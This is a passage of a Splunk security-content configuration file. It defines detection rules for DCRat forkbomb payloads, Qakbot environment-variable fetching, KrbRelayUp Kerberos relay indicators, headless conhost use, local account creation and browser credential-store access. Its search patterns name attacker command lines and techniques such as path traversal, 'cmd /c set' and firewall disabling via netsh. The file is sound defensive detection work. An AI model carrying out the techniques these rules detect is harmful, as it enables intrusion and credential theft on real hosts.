of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process="*\/..\/..\/..\/*" OR Processes.process="*\\..\\..\\..\\*" OR Processes.process="*\/\/..\/\/..\/\/..\/\/*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_command_and_scripting_interpreter_path_traversal_exec_filter` [ESCU - Windows Command Shell DCRat ForkBomb Payload - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies DCRat "forkbomb" payload feature. This technique was seen in dark crystal RAT backdoor capabilities where it will execute several cmd child process executing "notepad.exe & pause". The following analytic detects the multiple cmd.exe and child process notepad.exe execution using batch script in the targeted host within 30s timeframe. this TTP can be a good pivot to check DCRat infection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies DCRat "forkbomb" payload feature. This technique was seen in dark crystal RAT backdoor capabilities where it will execute several cmd child process executing "notepad.exe & pause". The following analytic detects the multiple cmd.exe and child process notepad.exe execution using batch script in the targeted host within 30s timeframe. this TTP can be a good pivot to check DCRat infection. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-07-28 action.escu.modification_date = 2022-07-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Command Shell DCRat ForkBomb Payload - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkCrystal RAT"] action.risk = 1 action.risk.param._risk_message = Multiple cmd.exe processes with child process of notepad.exe executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Command Shell DCRat ForkBomb Payload - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkCrystal RAT"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies DCRat "forkbomb" payload feature. This technique was seen in dark crystal RAT backdoor capabilities where it will execute several cmd child process executing "notepad.exe & pause". The following analytic detects the multiple cmd.exe and child process notepad.exe execution using batch script in the targeted host within 30s timeframe. this TTP can be a good pivot to check DCRat infection. action.notable.param.rule_title = Windows Command Shell DCRat ForkBomb Payload action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.parent_process_id) as parent_process_id values(Processes.process_id) as process_id dc(Processes.parent_process_id) as parent_process_id_count dc(Processes.process_id) as process_id_count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name= "cmd.exe" (Processes.process_name = "notepad.exe" OR Processes.original_file_name= "notepad.exe") Processes.parent_process = "*.bat*" by Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.parent_process Processes.dest Processes.user _time span=30s | where parent_process_id_count>= 10 AND process_id_count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_command_shell_dcrat_forkbomb_payload_filter` [ESCU - Windows Command Shell Fetch Env Variables - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious process command line fetching the environment variables with a non-shell parent process. This technique was seen in qakbot malware where it fetches the environment variable in the target or compromised host. This TTP detection is a good pivot of possible malicious behavior since the command line is executed by a common non-shell process like cmd.exe , powershell.exe and many more. This can also be a good sign that the parent process has a malicious code injected to it to execute this command. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a suspicious process command line fetching the environment variables with a non-shell parent process. This technique was seen in qakbot malware where it fetches the environment variable in the target or compromised host. This TTP detection is a good pivot of possible malicious behavior since the command line is executed by a common non-shell process like cmd.exe , powershell.exe and many more. This can also be a good sign that the parent process has a malicious code injected to it to execute this command. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = shell process that are not included in this search may cause False positive. Filter is needed. action.escu.creation_date = 2022-10-27 action.escu.modification_date = 2022-10-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Command Shell Fetch Env Variables - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Qakbot"] action.risk = 1 action.risk.param._risk_message = non-shell parent process has a child process $process_name$ with a commandline $process$ to fetch env variables in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Command Shell Fetch Env Variables - Rule action.correlationsearch.annotations = {"analytic_story": ["Qakbot"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a suspicious process command line fetching the environment variables with a non-shell parent process. This technique was seen in qakbot malware where it fetches the environment variable in the target or compromised host. This TTP detection is a good pivot of possible malicious behavior since the command line is executed by a common non-shell process like cmd.exe , powershell.exe and many more. This can also be a good sign that the parent process has a malicious code injected to it to execute this command. action.notable.param.rule_title = Windows Command Shell Fetch Env Variables action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*cmd /c set" OR Processes.process = "*cmd.exe /c set" AND NOT (Processes.parent_process_name = "cmd.exe" OR Processes.parent_process_name = "powershell*" OR Processes.parent_process_name="pwsh.exe" OR Processes.parent_process_name = "explorer.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_command_shell_fetch_env_variables_filter` [ESCU - Windows Common Abused Cmd Shell Risk Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = The following correlation identifies instances where four or more distinct detection analytics are associated with malicious command line behavior that is known to be exploited by multiple threat actors, adversaries, or red teamers on a specific host. By leveraging the Command Line Interface (CLI), attackers can execute malicious commands, gain access to sensitive data, install backdoors, and engage in various nefarious activities. The impact of such compromise can be severe, as attackers may gain unauthorized control over the compromised system, enabling them to exfiltrate valuable information, escalate privileges, or launch further attacks within the network. If this detection is triggered, there is a high level of confidence in the occurrence of suspicious command line activities on the host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Actions on Objectives", "Installation"], "mitre_attack": ["T1222", "T1049", "T1033", "T1529", "T1016", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following correlation identifies instances where four or more distinct detection analytics are associated with malicious command line behavior that is known to be exploited by multiple threat actors, adversaries, or red teamers on a specific host. By leveraging the Command Line Interface (CLI), attackers can execute malicious commands, gain access to sensitive data, install backdoors, and engage in various nefarious activities. The impact of such compromise can be severe, as attackers may gain unauthorized control over the compromised system, enabling them to exfiltrate valuable information, escalate privileges, or launch further attacks within the network. If this detection is triggered, there is a high level of confidence in the occurrence of suspicious command line activities on the host. action.escu.how_to_implement = Splunk Enterprise Security is required to utilize this correlation. In addition, modify the source_count value to your environment. In our testing, a count of 4 or 5 was decent in a lab, but the number may need to be increased base on internal testing. In addition, based on false positives, modify any analytics to be anomaly and lower or increase risk based on organization importance. action.escu.known_false_positives = False positives will be present based on many factors. Tune the correlation as needed to reduce too many triggers. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Common Abused Cmd Shell Risk Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Azorult", "Volt Typhoon", "Sandworm Tools", "Windows Post-Exploitation", "FIN7", "Qakbot", "Netsh Abuse", "DarkCrystal RAT", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Disabling Security Tools"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Windows Common Abused Cmd Shell Risk Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Volt Typhoon", "Sandworm Tools", "Windows Post-Exploitation", "FIN7", "Qakbot", "Netsh Abuse", "DarkCrystal RAT", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Disabling Security Tools"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Actions on Objectives", "Installation"], "mitre_attack": ["T1222", "T1049", "T1033", "T1529", "T1016", "T1059"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following correlation identifies instances where four or more distinct detection analytics are associated with malicious command line behavior that is known to be exploited by multiple threat actors, adversaries, or red teamers on a specific host. By leveraging the Command Line Interface (CLI), attackers can execute malicious commands, gain access to sensitive data, install backdoors, and engage in various nefarious activities. The impact of such compromise can be severe, as attackers may gain unauthorized control over the compromised system, enabling them to exfiltrate valuable information, escalate privileges, or launch further attacks within the network. If this detection is triggered, there is a high level of confidence in the occurrence of suspicious command line activities on the host. action.notable.param.rule_title = RBA: Windows Common Abused Cmd Shell Risk Behavior action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where source IN ("*Cmdline Tool Not Executed In CMD Shell*", "*Windows System Network Config Discovery Display DNS*", "*Local Account Discovery With Wmic*", "*Net Localgroup Discovery*", "*Create local admin accounts using net exe*", "*Local Account Discovery with Net*", "*Icacls Deny Command*", "*ICACLS Grant Command*", "*Windows Proxy Via Netsh*", "*Processes launching netsh*", "*Disabling Firewall with Netsh*", "*Windows System Network Connections Discovery Netsh*", "*Network Connection Discovery With Arp*", "*Windows System Discovery Using ldap Nslookup*", "*Windows System Shutdown CommandLine*") by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `windows_common_abused_cmd_shell_risk_behavior_filter` [ESCU - Windows Computer Account Created by Computer Account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifes a Computer Account creating a new Computer Account with specific a Service Principle Name - "RestrictedKrbHost". The RestrictedKrbHost service class allows client applications to use Kerberos authentication when they do not have the identity of the service but have the server name. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifes a Computer Account creating a new Computer Account with specific a Service Principle Name - "RestrictedKrbHost". The RestrictedKrbHost service class allows client applications to use Kerberos authentication when they do not have the identity of the service but have the server name. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4741 EventCode enabled. The Windows TA is also required. action.escu.known_false_positives = It is possible third party applications may have a computer account that adds computer accounts, filtering may be required. action.escu.creation_date = 2022-04-27 action.escu.modification_date = 2022-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Computer Account Created by Computer Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"] action.risk = 1 action.risk.param._risk_message = A Computer Account created a Computer Account on $dest$, possibly indicative of Kerberos relay attack. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Computer Account Created by Computer Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifes a Computer Account creating a new Computer Account with specific a Service Principle Name - "RestrictedKrbHost". The RestrictedKrbHost service class allows client applications to use Kerberos authentication when they do not have the identity of the service but have the server name. action.notable.param.rule_title = Windows Computer Account Created by Computer Account action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4741 user_type=computer Subject_Account_Domain!="NT AUTHORITY" Message=*RestrictedKrbHost* | stats count min(_time) as firstTime max(_time) as lastTime by dest, subject, action ,src_user, user, Account_Name, Subject_Account_Name,Subject_Account_Domain | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_computer_account_created_by_computer_account_filter` [ESCU - Windows Computer Account Requesting Kerberos Ticket - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a ComputerAccount requesting a Kerberos Ticket. typically, a user account requests a Kerberos ticket. This behavior was identified with KrbUpRelay, but additional Kerberos attacks have exhibited similar behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a ComputerAccount requesting a Kerberos Ticket. typically, a user account requests a Kerberos ticket. This behavior was identified with KrbUpRelay, but additional Kerberos attacks have exhibited similar behavior. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4768 EventCode enabled. The Windows TA is also required. action.escu.known_false_positives = It is possible false positives will be present based on third party applications. Filtering may be needed. action.escu.creation_date = 2022-04-27 action.escu.modification_date = 2022-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Computer Account Requesting Kerberos Ticket - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"] action.risk = 1 action.risk.param._risk_message = A Computer Account requested a Kerberos ticket on $dest$, possibly indicative of Kerberos relay attack. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Computer Account Requesting Kerberos Ticket - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a ComputerAccount requesting a Kerberos Ticket. typically, a user account requests a Kerberos ticket. This behavior was identified with KrbUpRelay, but additional Kerberos attacks have exhibited similar behavior. action.notable.param.rule_title = Windows Computer Account Requesting Kerberos Ticket action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4768 Account_Name="*$" src_ip!="::1" | stats count min(_time) as firstTime max(_time) as lastTime by dest, subject, action, Supplied_Realm_Name, user, Account_Name, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_computer_account_requesting_kerberos_ticket_filter` [ESCU - Windows Computer Account With SPN - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies two SPNs, HOST and RestrictedKrbHost, added using the KrbRelayUp behavior. This particular behavior has been found in other Kerberos based attacks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies two SPNs, HOST and RestrictedKrbHost, added using the KrbRelayUp behavior. This particular behavior has been found in other Kerberos based attacks. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4741 EventCode enabled. The Windows TA is also required. action.escu.known_false_positives = It is possible third party applications may add these SPNs to Computer Accounts, filtering may be needed. action.escu.creation_date = 2022-04-28 action.escu.modification_date = 2022-04-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Computer Account With SPN - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"] action.risk = 1 action.risk.param._risk_message = A Computer Account was created with SPNs related to Kerberos on $dest$, possibly indicative of Kerberos relay attack. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Computer Account With SPN - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies two SPNs, HOST and RestrictedKrbHost, added using the KrbRelayUp behavior. This particular behavior has been found in other Kerberos based attacks. action.notable.param.rule_title = Windows Computer Account With SPN action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4741 MSADChangedAttributes IN ("*HOST/*","*RestrictedKrbHost/*") AND New_UAC_Value=0x80 | eval Effecting_Account=mvindex(Security_ID,1) | eval New_Computer_Account_Name=mvindex(Security_ID,0) | stats count min(_time) as firstTime max(_time) as lastTime values(EventCode),values(Account_Domain),values(Security_ID), values(Effecting_Account), values(New_Computer_Account_Name),values(SAM_Account_Name),values(DNS_Host_Name),values(MSADChangedAttributes) by dest Logon_ID subject | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_computer_account_with_spn_filter` [ESCU - Windows ConHost with Headless Argument - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the unusual use of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter to spawn a new process. This behavior is highly unusual and indicative of suspicious activity, as the --headless parameter is not commonly used in legitimate operations. The analytic identifies this behavior by looking for instances where conhost.exe is invoked with the --headless argument. This behavior is worth identifying for a Security Operations Center (SOC) as it could indicate an attacker's attempt to execute commands or scripts in a stealthy manner, potentially to establish persistence, perform lateral movement, or carry out other malicious activities. If a true positive is identified, it suggests that an attacker has gained a foothold in the environment and is attempting to further their attack, which could lead to serious consequences such as data exfiltration, system compromise, or deployment of ransomware. Potential false positives could arise from legitimate administrative activity, hence it is important to validate the context of the detected behavior during triage. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003", "T1564.006"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the unusual use of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter to spawn a new process. This behavior is highly unusual and indicative of suspicious activity, as the --headless parameter is not commonly used in legitimate operations. The analytic identifies this behavior by looking for instances where conhost.exe is invoked with the --headless argument. This behavior is worth identifying for a Security Operations Center (SOC) as it could indicate an attacker's attempt to execute commands or scripts in a stealthy manner, potentially to establish persistence, perform lateral movement, or carry out other malicious activities. If a true positive is identified, it suggests that an attacker has gained a foothold in the environment and is attempting to further their attack, which could lead to serious consequences such as data exfiltration, system compromise, or deployment of ransomware. Potential false positives could arise from legitimate administrative activity, hence it is important to validate the context of the detected behavior during triage. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present if the application is legitimately used, filter by user or endpoint as needed. action.escu.creation_date = 2023-11-01 action.escu.modification_date = 2023-11-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows ConHost with Headless Argument - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = Windows ConHost with Headless Argument detected on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 70}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows ConHost with Headless Argument - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 70, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003", "T1564.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the unusual use of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter to spawn a new process. This behavior is highly unusual and indicative of suspicious activity, as the --headless parameter is not commonly used in legitimate operations. The analytic identifies this behavior by looking for instances where conhost.exe is invoked with the --headless argument. This behavior is worth identifying for a Security Operations Center (SOC) as it could indicate an attacker's attempt to execute commands or scripts in a stealthy manner, potentially to establish persistence, perform lateral movement, or carry out other malicious activities. If a true positive is identified, it suggests that an attacker has gained a foothold in the environment and is attempting to further their attack, which could lead to serious consequences such as data exfiltration, system compromise, or deployment of ransomware. Potential false positives could arise from legitimate administrative activity, hence it is important to validate the context of the detected behavior during triage. action.notable.param.rule_title = Windows ConHost with Headless Argument action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=conhost.exe Processes.process="*--headless *" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_conhost_with_headless_argument_filter` [ESCU - Windows Create Local Account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a new local user account added to a computer. Note that, this should be restricted to critical assets. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies a new local user account added to a computer. Note that, this should be restricted to critical assets. action.escu.how_to_implement = This search requires you to have enabled your Group Management Audit Logs in your Local Windows Security Policy and be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/ action.escu.known_false_positives = It is possible that an administrator created the account. Verifying activity with an administrator is advised. This analytic is set to anomaly to allow for risk to be added. Filter and tune as needed. Restrict to critical infrastructure to reduce any volume. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Create Local Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Password Spraying"] action.risk = 1 action.risk.param._risk_message = The following $user$ was added to $dest$ as a local account. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Create Local Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Password Spraying"], "cis20": ["CIS 10"], "confidence": 90, "impact": 20, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(All_Changes.result_id) as result_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Change where All_Changes.result_id=4720 by All_Changes.user All_Changes.dest All_Changes.result All_Changes.action | `drop_dm_object_name("All_Changes")` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `windows_create_local_account_filter` [ESCU - Windows Credential Access From Browser Password Store - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a possible non-common browser process accessing its browser user data profile. This tactic/technique has been observed in various Trojan Stealers, such as SnakeKeylogger, which attempt to gather sensitive browser information and credentials as part of their exfiltration strategy. Detecting this anomaly can serve as a valuable pivot for identifying processes that access lists of browser user data profiles unexpectedly. This detection uses a lookup file `browser_app_list` that maintains a list of well known browser applications and the browser paths that are allowed to access the browser user data profiles. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a possible non-common browser process accessing its browser user data profile. This tactic/technique has been observed in various 